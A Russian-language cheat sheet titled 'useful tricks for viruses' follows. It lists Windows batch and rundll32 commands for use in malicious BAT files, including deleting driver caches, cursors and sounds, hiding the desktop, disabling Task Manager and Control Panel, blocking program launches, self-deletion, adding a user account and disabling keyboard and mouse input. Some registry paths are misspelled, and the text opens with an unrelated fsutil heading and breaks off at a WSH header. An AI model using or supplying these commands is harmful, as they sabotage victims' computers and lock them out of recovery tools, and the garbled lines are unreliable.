В следующей таблице перечислены подкоманды команды fsutil
Полезные фишки для вирусов.
| Удалить дрова | del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul |
| Убрать рабочий стол | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul |
| Самоликвидация | del "%0" >nul |
| Cнимаем системные атрибуты с некоторых файлов в указанной директории | attrib -s -r -h -a %systemdrive%*.* |
| Запрещает ТаскМена | reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v DdisableTaskMgr /t REG_DWORD /d 1 /f >nul |
| Мнеяет кнопки мыши местами,можно здорово подпортить нервы кому нидь | %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul |
| Запрет запуска программ | reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul |
| Удаляет курсоры мыши | del "%SystemRoot%\Cursors\*.*" >nul |
| Удаляет звуки винды | del "%SystemRoot%\Media" /q >nul |
| Запретить панель управления | reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul |
| Cоздать новую учетную запись в данном случае будетназываться ламер | net user "ламер" /add >nul |
RUNDLL юзать прямо и тупо - пишете строку в BAT-файл и все:
| rundll32 shell32.dll,Control_RunDLL hotplug.dll | диалоговое окно Отключение или извлечение аппаратного устройства |
| rundll32 diskcopy,DiskCopyRunDll | вызов диалога "Копирование диска" |
| rundll32 keyboard,disable | отключение клавиатуры, действует до следующей перезагрузки. |
| rundll32 mouse,disable | отключение мыши вплоть до перезагрузки. |
| rundll32 krnl386.exe,exitkernel | выгрузить ядро системы, выход из Windows |
| rundll32 mshtml.dll,PrintHTML "HtmlFileNameAndPath" | распечатать документ HTML, где "HtmlFileNameAndPath" - путь к файлу и его имя |
| rundll32 мсprint2.dll,RUNDLL_PrintTestPage | распечатать тестовую страницу на принтере |
| rundll32 netplwiz.dll,AddNetPlaceRunDll | вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение" |
| rundll32 rnaui.dll,RnaWizard | вызов мастера "Удаленный доступ к сети" |
| rundll32 rnaui.dll,RnaWizard /1 | вызов мастера "Удаленный доступ к сети" без отображения начального окна |
| rundll32 shell,ShellExecute | открыть Проводник (папка "Рабочий стол") |
| rundll32 shell32,Control_RunDLL | открыть в Проводнике папку "Панель управления" |
| rundll32 shell32,Control_RunDLL appwiz.cpl,,n | вызов диалогового окна "Установка и удаление программ", в котором будет открыта вкладка с номером "n" (от 1 до 3) |
| rundll32 shell32,Control_RunDLL main.cpl @0 | открыть диалог "Свойства мыши" |
| rundll32 shell32,Control_RunDLL main.cpl @1 | открыть диалог "Свойства клавиатуры" |
| rundll32 shell32,Control_RunDLL main.cpl @2 | открыть папку "Принтеры" |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder | открыть папку "Принтеры" (другой способ) |
| rundll32 shell32,Control_RunDLL main.cpl @3 | открыть папку "Шрифты" |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder | открыть папку "Шрифты" (другой способ) |
| rundll32 SHELL32,Control_RunDLL modem.cpl, add | открыть диалог "Свойства модема" |
| rundll32 shell32,Control_RunDLL timedate.cpl | открыть диалог "Дата и время" |
| rundll32 shell32,OpenAs_RunDLL | вызвать диалог "Открыть с помощью..." |
| rundll32 shell32,ShellAboutA WINHOWTO.RU | информация о версии Windows |
| rundll32 shell32,SHExitWindowsEx 0 | закрыть все программы, перегрузить оболочку |
| rundll32 shell32, SHExitWindowsEx 1 | выключить ПК |
| rundll32 SHELL32, SHExitWindowsEx -1 | перегрузить оболочку Windows |
| rundll32 shell32, SHExitWindowsEx 2 | перегрузить ПК |
| rundll32 shell32,SHExitWindowsEx 4 | принудительно закрыть все программы. |
| rundll32 shell32,SHExitWindowsEx 8 | выход из Windows и выключение ATX-совместимого ПК |
| rundll32 shell32,SHFormatDrive | вызов диалога форматирования диска А: |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter | запуск "Мастера установки принтера" |
| rundll32 shell32,SHHelpShortcuts_RunDLL Connect | запуск мастера подключения сетевого диска |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage | распечатать тестовую страницу |
| rundll32 sysdm.cpl,InstallDevice_Rundll | вызов мастера установки оборудования |
| rundll32 url.dll,FileProtocolHandler %1 | открыть веб-страницу, где %1 - URL сайта (включая [link=http://).]http://).[/link] |
| rundll32 url.dll,MailToProtocolHandler %1 | создать новое письмо, где %1 - e-mail адресата |
| rundll32 user,CASCADECHILDWINDOWS | расположить все окна каскадом |
| rundll32 user,TILECHILDWINDOWS | расположить все окна по экрану |
| rundll32 user,disableoemlayer | сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать |
| rundll32 user,ExitWindowsExec | быстрая перезагрузка Windows |
| rundll32 user,RepaintScreen | выполнить команду "Обновить" |
| rundll32 user,SetCaretBlinkTime n | задать частоту мигания курсора, соответствующую значению параметра n |
| rundll32 user,SetCursorPos | переместить курсор мыши в верхний левый угол экрана |
| rundll32 user,SetDoubleClickTime n | задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n |
| rundll32 user,SwapMouseButton | поменять местами клавиши мыши (обратная смена невозможна) |
| rundll32 user,WNetConnectDialog | вызов диалога "Подключение сетевого диска" |
| rundll32 user,WNetDisconnectDialog | вызов диалога "Отключение сетевого диска" |
| rundll32 AppWiz.Cpl,NewLinkHere %1 | запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу |
WSH(работает только в win2000):